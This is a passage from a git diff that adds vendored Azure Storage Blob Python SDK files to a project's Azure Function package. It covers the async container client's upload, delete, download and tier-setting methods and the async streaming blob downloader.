that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the container has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int max_concurrency: + Maximum number of parallel connections to use when the blob size exceeds + 64MB. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword progress_hook: + An async callback to track the progress of a long running upload. The signature is + function(current: int, total: Optional[int]) where current is the number of bytes transfered + so far, and total is the size of the blob or None if the size is unknown. + :paramtype progress_hook: Callable[[int, Optional[int]], Awaitable[None]] + :returns: A BlobClient to interact with the newly uploaded blob. + :rtype: ~azure.storage.blob.aio.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START upload_blob_to_container] + :end-before: [END upload_blob_to_container] + :language: python + :dedent: 12 + :caption: Upload blob to the container. + """ + blob = self.get_blob_client(name) + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + encoding = kwargs.pop('encoding', 'UTF-8') + await blob.upload_blob( + data, + blob_type=blob_type, + length=length, + metadata=metadata, + timeout=timeout, + encoding=encoding, + **kwargs + ) + return blob + + @distributed_trace_async + async def delete_blob( + self, blob, # type: Union[str, BlobProperties] + delete_snapshots=None, # type: Optional[str] + **kwargs + ): + # type: (...) -> None + """Marks the specified blob or snapshot for deletion. + + The blob is later deleted during garbage collection. + Note that in order to delete a blob, you must delete all of its + snapshots. You can delete both at the same time with the delete_blob + operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blob or snapshot + and retains the blob or snapshot for specified number of days. + After specified number of days, blob's data is removed from the service during garbage collection. + Soft deleted blob or snapshot is accessible through :func:`list_blobs()` specifying `include=["deleted"]` + option. Soft-deleted blob or snapshot can be restored using :func:`~BlobClient.undelete()` + + :param blob: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob: str or ~azure.storage.blob.BlobProperties + :param str delete_snapshots: + Required if the blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. Value can be a Lease object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + blob = self.get_blob_client(blob) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + await blob.delete_blob( # type: ignore + delete_snapshots=delete_snapshots, + timeout=timeout, + **kwargs) + + @distributed_trace_async + async def download_blob(self, blob, offset=None, length=None, **kwargs): + # type: (Union[str, BlobProperties], Optional[int], Optional[int], Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an async iterator which allows the user to iterate over the content in chunks. + + :param blob: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob: str or ~azure.storage.blob.BlobProperties + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, download_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword str encoding: + Encoding to decode the downloaded bytes. Default is None, i.e. no decoding. + :keyword progress_hook: + An async callback to track the progress of a long running download. The signature is + function(current: int, total: int) where current is the number of bytes transfered + so far, and total is the total size of the download. + :paramtype progress_hook: Callable[[int, int], Awaitable[None]] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: A streaming object. (StorageStreamDownloader) + :rtype: ~azure.storage.blob.aio.StorageStreamDownloader + """ + blob_client = self.get_blob_client(blob) # type: ignore + kwargs.setdefault('merge_span', True) + return await blob_client.download_blob( + offset=offset, + length=length, + **kwargs) + + @distributed_trace_async + async def delete_blobs( # pylint: disable=arguments-differ + self, *blobs: List[Union[str, BlobProperties, dict]], + **kwargs + ) -> AsyncIterator[AsyncHttpResponse]: + """Marks the specified blobs or snapshots for deletion. + + The blobs are later deleted during garbage collection. + Note that in order to delete blobs, you must delete all of their + snapshots. You can delete both at the same time with the delete_blobs operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blobs or snapshots + and retains the blobs or snapshots for specified number of days. + After specified number of days, blobs' data is removed from the service during garbage collection. + Soft deleted blobs or snapshots are accessible through :func:`list_blobs()` specifying `include=["deleted"]` + Soft-deleted blobs or snapshots can be restored using :func:`~BlobClient.undelete()` + + The maximum number of blobs that can be deleted in a single request is 256. + + :param blobs: + The blobs to delete. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + + blob name: + key: 'name', value type: str + snapshot you want to delete: + key: 'snapshot', value type: str + whether to delete snapthots when deleting blob: + key: 'delete_snapshots', value: 'include' or 'only' + if the blob modified or not: + key: 'if_modified_since', 'if_unmodified_since', value type: datetime + etag: + key: 'etag', value type: str + match the etag or not: + key: 'match_condition', value type: MatchConditions + tags match condition: + key: 'if_tags_match_condition', value type: str + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword str delete_snapshots: + Required if a blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. For optimal performance, + this should be set to False + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: An async iterator of responses, one for each blob in order + :rtype: asynciterator[~azure.core.pipeline.transport.AsyncHttpResponse] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START delete_multiple_blobs] + :end-before: [END delete_multiple_blobs] + :language: python + :dedent: 12 + :caption: Deleting multiple blobs. + """ + if len(blobs) == 0: + return iter(list()) + + reqs, options = self._generate_delete_blobs_options(*blobs, **kwargs) + + return await self._batch_send(*reqs, **options) + + @distributed_trace + async def set_standard_blob_tier_blobs( + self, + standard_blob_tier: Union[str, 'StandardBlobTier'], + *blobs: List[Union[str, BlobProperties, dict]], + **kwargs + ) -> AsyncIterator[AsyncHttpResponse]: + """This operation sets the tier on block blobs. + + A block blob's tier determines Hot/Cool/Archive storage type. + This operation does not update the blob's ETag. + + The maximum number of blobs that can be updated in a single request is 256. + + :param standard_blob_tier: + Indicates the tier to be set on all blobs. Options include 'Hot', 'Cool', + 'Archive'. The hot tier is optimized for storing data that is accessed + frequently. The cool storage tier is optimized for storing data that + is infrequently accessed and stored for at least a month. The archive + tier is optimized for storing data that is rarely accessed and stored + for at least six months with flexible latency requirements. + + .. note:: + If you want to set different tier on different blobs please set this positional parameter to None. + Then the blob tier on every BlobProperties will be taken. + + :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier + :param blobs: + The blobs with which to interact. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + blob name: + key: 'name', value type: str + standard blob tier: + key: 'blob_tier', value type: StandardBlobTier + rehydrate priority: + key: 'rehydrate_priority', value type: RehydratePriority + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + tags match condition: + key: 'if_tags_match_condition', value type: str + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. For optimal performance, + this should be set to False. + :return: An async iterator of responses, one for each blob in order + :rtype: asynciterator[~azure.core.pipeline.transport.AsyncHttpResponse] + """ + reqs, options = self._generate_set_tiers_options(standard_blob_tier, *blobs, **kwargs) + + return await self._batch_send(*reqs, **options) + + @distributed_trace + async def set_premium_page_blob_tier_blobs( + self, + premium_page_blob_tier: Union[str, 'PremiumPageBlobTier'], + *blobs: List[Union[str, BlobProperties, dict]], + **kwargs + ) -> AsyncIterator[AsyncHttpResponse]: + """Sets the page blob tiers on the blobs. This API is only supported for page blobs on premium accounts. + + The maximum number of blobs that can be updated in a single request is 256. + + :param premium_page_blob_tier: + A page blob tier value to set on all blobs to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + + .. note:: + If you want to set different tier on different blobs please set this positional parameter to None. + Then the blob tier on every BlobProperties will be taken. + + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :param blobs: The blobs with which to interact. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + + blob name: + key: 'name', value type: str + premium blob tier: + key: 'blob_tier', value type: PremiumPageBlobTier + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. For optimal performance, + this should be set to False. + :return: An async iterator of responses, one for each blob in order + :rtype: asynciterator[~azure.core.pipeline.transport.AsyncHttpResponse] + """ + reqs, options = self._generate_set_tiers_options(premium_page_blob_tier, *blobs, **kwargs) + + return await self._batch_send(*reqs, **options) + + def get_blob_client( + self, blob, # type: Union[BlobProperties, str] + snapshot=None # type: str + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param blob: + The blob with which to interact. + :type blob: str or ~azure.storage.blob.BlobProperties + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`~BlobClient.create_snapshot()`. + :returns: A BlobClient. + :rtype: ~azure.storage.blob.aio.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_blob_client] + :end-before: [END get_blob_client] + :language: python + :dedent: 12 + :caption: Get the blob client. + """ + blob_name = _get_blob_name(blob) + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( + self.url, container_name=self.container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_download_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_download_async.py new file mode 100644 index 0000000..6248faa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_download_async.py @@ -0,0 +1,555 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method + +import asyncio +import sys +from io import BytesIO +from itertools import islice +import warnings +from typing import AsyncIterator + +from aiohttp import ClientPayloadError +from azure.core.exceptions import HttpResponseError, ServiceResponseError +from .._shared.encryption import decrypt_blob +from .._shared.request_handlers import validate_and_format_range_headers +from .._shared.response_handlers import process_storage_error, parse_length_from_content_range +from .._deserialize import get_page_ranges_result +from .._download import process_range_and_offset, _ChunkDownloader + +async def process_content(data, start_offset, end_offset, encryption): + if data is None: + raise ValueError("Response cannot be None.") + content = data.response.body() + if encryption.get('key') is not None or encryption.get('resolver') is not None: + try: + return decrypt_blob( + encryption.get('required'), + encryption.get('key'), + encryption.get('resolver'), + content, + start_offset, + end_offset, + data.response.headers) + except Exception as error: + raise HttpResponseError( + message="Decryption failed.", + response=data.response, + error=error) + return content + + +class _AsyncChunkDownloader(_ChunkDownloader): + def __init__(self, **kwargs): + super(_AsyncChunkDownloader, self).__init__(**kwargs) + self.stream_lock = asyncio.Lock() if kwargs.get('parallel') else None + self.progress_lock = asyncio.Lock() if kwargs.get('parallel') else None + + async def process_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + chunk_data = await self._download_chunk(chunk_start, chunk_end - 1) + length = chunk_end - chunk_start + if length > 0: + await self._write_to_stream(chunk_data, chunk_start) + await self._update_progress(length) + + async def yield_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + return await self._download_chunk(chunk_start, chunk_end - 1) + + async def _update_progress(self, length): + if self.progress_lock: + async with self.progress_lock: # pylint: disable=not-async-context-manager + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + await self.progress_hook(self.progress_total, self.total_size) + + async def _write_to_stream(self, chunk_data, chunk_start): + if self.stream_lock: + async with self.stream_lock: # pylint: disable=not-async-context-manager + self.stream.seek(self.stream_start + (chunk_start - self.start_index)) + self.stream.write(chunk_data) + else: + self.stream.write(chunk_data) + + async def _download_chunk(self, chunk_start, chunk_end): + download_range, offset = process_range_and_offset( + chunk_start, chunk_end, chunk_end, self.encryption_options) + + # No need to download the empty chunk from server if there's no data in the chunk to be downloaded. + # Do optimize and create empty chunk locally if condition is met. + if self._do_optimize(download_range[0], download_range[1]): + chunk_data = b"\x00" * self.chunk_size + else: + range_header, range_validation = validate_and_format_range_headers( + download_range[0], + download_range[1], + check_content_md5=self.validate_content + ) + retry_active = True + retry_total = 3 + while retry_active: + try: + _, response = await self.client.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self.validate_content, + data_stream_total=self.total_size, + download_stream_current=self.progress_total, + **self.request_options + ) + retry_active = False + + except HttpResponseError as error: + process_storage_error(error) + except ClientPayloadError as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + await asyncio.sleep(1) + + chunk_data = await process_content(response, offset[0], offset[1], self.encryption_options) + + + # This makes sure that if_match is set so that we can validate + # that subsequent downloads are to an unmodified blob + if self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = response.properties.etag + + return chunk_data + + +class _AsyncChunkIterator(object): + """Async iterator for chunks in blob download stream.""" + + def __init__(self, size, content, downloader, chunk_size): + self.size = size + self._chunk_size = chunk_size + self._current_content = content + self._iter_downloader = downloader + self._iter_chunks = None + self._complete = (size == 0) + + def __len__(self): + return self.size + + def __iter__(self): + raise TypeError("Async stream must be iterated asynchronously.") + + def __aiter__(self): + return self + + async def __anext__(self): + """Iterate through responses.""" + if self._complete: + raise StopAsyncIteration("Download complete") + if not self._iter_downloader: + # cut the data obtained from initial GET into chunks + if len(self._current_content) > self._chunk_size: + return self._get_chunk_data() + self._complete = True + return self._current_content + + if not self._iter_chunks: + self._iter_chunks = self._iter_downloader.get_chunk_offsets() + + # initial GET result still has more than _chunk_size bytes of data + if len(self._current_content) >= self._chunk_size: + return self._get_chunk_data() + + try: + chunk = next(self._iter_chunks) + self._current_content += await self._iter_downloader.yield_chunk(chunk) + except StopIteration: + self._complete = True + # it's likely that there some data left in self._current_content + if self._current_content: + return self._current_content + raise StopAsyncIteration("Download complete") + + return self._get_chunk_data() + + def _get_chunk_data(self): + chunk_data = self._current_content[: self._chunk_size] + self._current_content = self._current_content[self._chunk_size:] + return chunk_data + + +class StorageStreamDownloader(object): # pylint: disable=too-many-instance-attributes + """A streaming object to download from Azure Storage. + + :ivar str name: + The name of the blob being downloaded. + :ivar str container: + The name of the container where the blob is. + :ivar ~azure.storage.blob.BlobProperties properties: + The properties of the blob being downloaded. If only a range of the data is being + downloaded, this will be reflected in the properties. + :ivar int size: + The size of the total data in the stream. This will be the byte range if speficied, + otherwise the total size of the blob. + """ + + def __init__( + self, + clients=None, + config=None, + start_range=None, + end_range=None, + validate_content=None, + encryption_options=None, + max_concurrency=1, + name=None, + container=None, + encoding=None, + **kwargs + ): + self.name = name + self.container = container + self.properties = None + self.size = None + + self._clients = clients + self._config = config + self._start_range = start_range + self._end_range = end_range + self._max_concurrency = max_concurrency + self._encoding = encoding + self._validate_content = validate_content + self._encryption_options = encryption_options or {} + self._progress_hook = kwargs.pop('progress_hook', None) + self._request_options = kwargs + self._location_mode = None + self._download_complete = False + self._current_content = None + self._file_size = None + self._non_empty_ranges = None + self._response = None + + # The service only provides transactional MD5s for chunks under 4MB. + # If validate_content is on, get only self.MAX_CHUNK_GET_SIZE for the first + # chunk so a transactional MD5 can be retrieved. + self._first_get_size = self._config.max_single_get_size if not self._validate_content \ + else self._config.max_chunk_get_size + initial_request_start = self._start_range if self._start_range is not None else 0 + if self._end_range is not None and self._end_range - self._start_range < self._first_get_size: + initial_request_end = self._end_range + else: + initial_request_end = initial_request_start + self._first_get_size - 1 + + self._initial_range, self._initial_offset = process_range_and_offset( + initial_request_start, initial_request_end, self._end_range, self._encryption_options + ) + + def __len__(self): + return self.size + + async def _setup(self): + self._response = await self._initial_request() + self.properties = self._response.properties + self.properties.name = self.name + self.properties.container = self.container + + # Set the content length to the download size instead of the size of + # the last range + self.properties.size = self.size + + # Overwrite the content range to the user requested range + self.properties.content_range = 'bytes {0}-{1}/{2}'.format( + self._start_range, + self._end_range, + self._file_size + ) + + # Overwrite the content MD5 as it is the MD5 for the last range instead + # of the stored MD5 + # TODO: Set to the stored MD5 when the service returns this + self.properties.content_md5 = None + + if self.size == 0: + self._current_content = b"" + else: + self._current_content = await process_content( + self._response, + self._initial_offset[0], + self._initial_offset[1], + self._encryption_options + ) + + async def _initial_request(self): + range_header, range_validation = validate_and_format_range_headers( + self._initial_range[0], + self._initial_range[1], + start_range_required=False, + end_range_required=False, + check_content_md5=self._validate_content) + + retry_active = True + retry_total = 3 + while retry_active: + try: + location_mode, response = await self._clients.blob.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self._validate_content, + data_stream_total=None, + download_stream_current=0, + **self._request_options) + + # Check the location we read from to ensure we use the same one + # for subsequent requests. + self._location_mode = location_mode + + # Parse the total file size and adjust the download size if ranges + # were specified + self._file_size = parse_length_from_content_range(response.properties.content_range) + if self._end_range is not None: + # Use the length unless it is over the end of the file + self.size = min(self._file_size, self._end_range - self._start_range + 1) + elif self._start_range is not None: + self.size = self._file_size - self._start_range + else: + self.size = self._file_size + retry_active = False + + except HttpResponseError as error: + if self._start_range is None and error.response.status_code == 416: + # Get range will fail on an empty file. If the user did not + # request a range, do a regular get request in order to get + # any properties. + try: + _, response = await self._clients.blob.download( + validate_content=self._validate_content, + data_stream_total=0, + download_stream_current=0, + **self._request_options) + retry_active = False + except HttpResponseError as error: + process_storage_error(error) + + # Set the download size to empty + self.size = 0 + self._file_size = 0 + else: + process_storage_error(error) + + except ClientPayloadError as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + await asyncio.sleep(1) + + # get page ranges to optimize downloading sparse page blob + if response.properties.blob_type == 'PageBlob': + try: + page_ranges = await self._clients.page_blob.get_page_ranges() + self._non_empty_ranges = get_page_ranges_result(page_ranges)[0] + except HttpResponseError: + pass + + # If the file is small, the download is complete at this point. + # If file size is large, download the rest of the file in chunks. + if response.properties.size != self.size: + if self._request_options.get('modified_access_conditions'): + self._request_options['modified_access_conditions'].if_match = response.properties.etag + else: + self._download_complete = True + return response + + def chunks(self): + # type: () -> AsyncIterator[bytes] + """Iterate over chunks in the download stream. + + :rtype: AsyncIterator[bytes] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START download_a_blob_in_chunk] + :end-before: [END download_a_blob_in_chunk] + :language: python + :dedent: 16 + :caption: Download a blob using chunks(). + """ + if self.size == 0 or self._download_complete: + iter_downloader = None + else: + data_end = self._file_size + if self._end_range is not None: + # Use the length unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + iter_downloader = _AsyncChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # Start where the first download ended + end_range=data_end, + stream=None, + parallel=False, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + **self._request_options) + return _AsyncChunkIterator( + size=self.size, + content=self._current_content, + downloader=iter_downloader, + chunk_size=self._config.max_chunk_get_size) + + async def readall(self): + """Download the contents of this blob. + + This operation is blocking until all data is downloaded. + :rtype: bytes or str + """ + stream = BytesIO() + await self.readinto(stream) + data = stream.getvalue() + if self._encoding: + return data.decode(self._encoding) + return data + + async def content_as_bytes(self, max_concurrency=1): + """Download the contents of this file. + + This operation is blocking until all data is downloaded. + + :keyword int max_concurrency: + The number of parallel connections with which to download. + :rtype: bytes + """ + warnings.warn( + "content_as_bytes is deprecated, use readall instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + return await self.readall() + + async def content_as_text(self, max_concurrency=1, encoding="UTF-8"): + """Download the contents of this blob, and decode as text. + + This operation is blocking until all data is downloaded. + + :param int max_concurrency: + The number of parallel connections with which to download. + :param str encoding: + Test encoding to decode the downloaded bytes. Default is UTF-8. + :rtype: str + """ + warnings.warn( + "content_as_text is deprecated, use readall instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + self._encoding = encoding + return await self.readall() + + async def readinto(self, stream): + """Download the contents of this blob to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. The stream must be seekable if the download + uses more than one parallel connection. + :returns: The number of bytes read. + :rtype: int + """ + # the stream must be seekable if parallel download is required + parallel = self._max_concurrency > 1 + if parallel: + error_message = "Target stream handle must be seekable." + if sys.version_info >= (3,) and not stream.seekable(): + raise ValueError(error_message) + + try: + stream.seek(stream.tell()) + except (NotImplementedError, AttributeError): + raise ValueError(error_message) + + # Write the content to the user stream + stream.write(self._current_content) + if self._progress_hook: + await self._progress_hook(len(self._current_content), self.size) + + if self._download_complete: + return self.size + + data_end = self._file_size + if self._end_range is not None: + # Use the length unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + + downloader = _AsyncChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # start where the first download ended + end_range=data_end, + stream=stream, + parallel=parallel, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + progress_hook=self._progress_hook, + **self._request_options) + + dl_tasks = downloader.get_chunk_offsets() + running_futures = [ + asyncio.ensure_future(downloader.process_chunk(d)) + for d in islice(dl_tasks, 0, self._max_concurrency) + ] + while running_futures: + # Wait for some download to finish before adding a new one + done, running_futures = await asyncio.wait( + running_futures, return_when=asyncio.FIRST_COMPLETED) + try: + for task in done: + task.result() + except HttpResponseError as error: + process_storage_error(error) + try: + next_chunk = next(dl_tasks) + except StopIteration: + break + else: + running_futures.add(asyncio.ensure_future(downloader.process_chunk(next_chunk))) + + if running_futures: + # Wait for the remaining downloads to finish + done, _running_futures = await asyncio.wait(running_futures) + try: + for task in done: + task.result() + except HttpResponseError as error: + process_storage_error(error) + return self.size + + async def download_to_stream(self, stream, max_concurrency=1): + """Download the contents of this blob to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. The stream must be seekable if the download + uses more than one parallel connection. + :param int max_concurrency: + The number of parallel connections with which to download. + :returns: The properties of the downloaded blob. + :rtype: Any + """ + warnings.warn( + "download_to_stream is deprecated, use readinto 